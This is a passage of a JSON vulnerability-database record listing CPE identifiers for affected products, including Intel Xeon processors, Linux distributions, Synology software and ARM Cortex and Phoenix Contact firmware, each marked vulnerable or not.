"cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8170:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8170m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8176m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_platinum:8180:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4108:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4109t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4110:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4112:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4114:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4114t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4116:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon_silver:4116t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:17.04:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:local_service_management_system:13.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:local_service_management_system:13.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:local_service_management_system:13.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:synology:diskstation_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.2.2-24922", "versionStartIncluding": "5.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:router_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.1.7-6941-1", "versionStartIncluding": "1.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:skynas:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:synology:virtual_machine_manager:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.2-23739", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:synology:vs960hd_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:synology:vs960hd:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:synology:vs360hd_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:synology:vs360hd:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12:sp3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_server:11:sp4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_server:12:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_server:12:sp2:*:*:*:*:raspberry_pi:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_server:12:sp3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_software_development_kit:11:sp4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_software_development_kit:12:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_software_development_kit:12:sp3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-r7_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-r7:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-r8_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-r8:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a8_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a8:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a9_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a9:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a12_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a12:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a15_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a15:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a17_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a17:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a57_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a57:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a72_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a72:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a73_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a73:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a75_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a75:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:arm:cortex-a76_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:arm:cortex-a76:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:pepperl-fuchs:visunet_rm_shell:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:pepperl-fuchs:btc12_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:pepperl-fuchs:btc12:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:pepperl-fuchs:btc14_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:pepperl-fuchs:btc14:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:hci:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc12_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc12_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc15_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc15_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc17_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc17_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_2000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_2000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_2001_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_2001:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_3000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_3000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_3001_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_3001:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc15_3000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc15_3000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc17_3000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc17_3000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_bpc_7001_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_bpc_7001:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc_7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc_7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc15_7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc15_7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_ppc17_7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_ppc17_7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_rackmount_2u_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_rackmount_2u:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl_rackmount_4u_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl_rackmount_4u:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_bpc_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_bpc_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_ppc_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_ppc_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_bpc_2000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_bpc_2000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_ppc_2000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_ppc_2000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_bpc_7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_bpc_7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:bl2_ppc_7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:bl2_ppc_7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:dl_ppc15_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:dl_ppc15_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:dl_ppc15m_7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:dl_ppc15m_7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:dl_ppc18.5m_7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:dl_ppc18.5m_7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:dl_ppc21.5m_7000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:dl_ppc21.5m_7000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:el_ppc_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:el_ppc_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:el_ppc_1000\\/wt_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:el_ppc_1000\\/wt:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:el_ppc_1000\\/m_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:el_ppc_1000\\/m:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:valueline_ipc_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:valueline_ipc:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_bpc_1000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_bpc_1000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_bpc_2000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_bpc_2000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_ppc_2000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_ppc_2000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_bpc_3000_firmware:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:phoenixcontact:vl_bpc_3000:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:phoenixcontact:vl_ppc_3000_firmware:-:*:*:*:*:*:*:*", 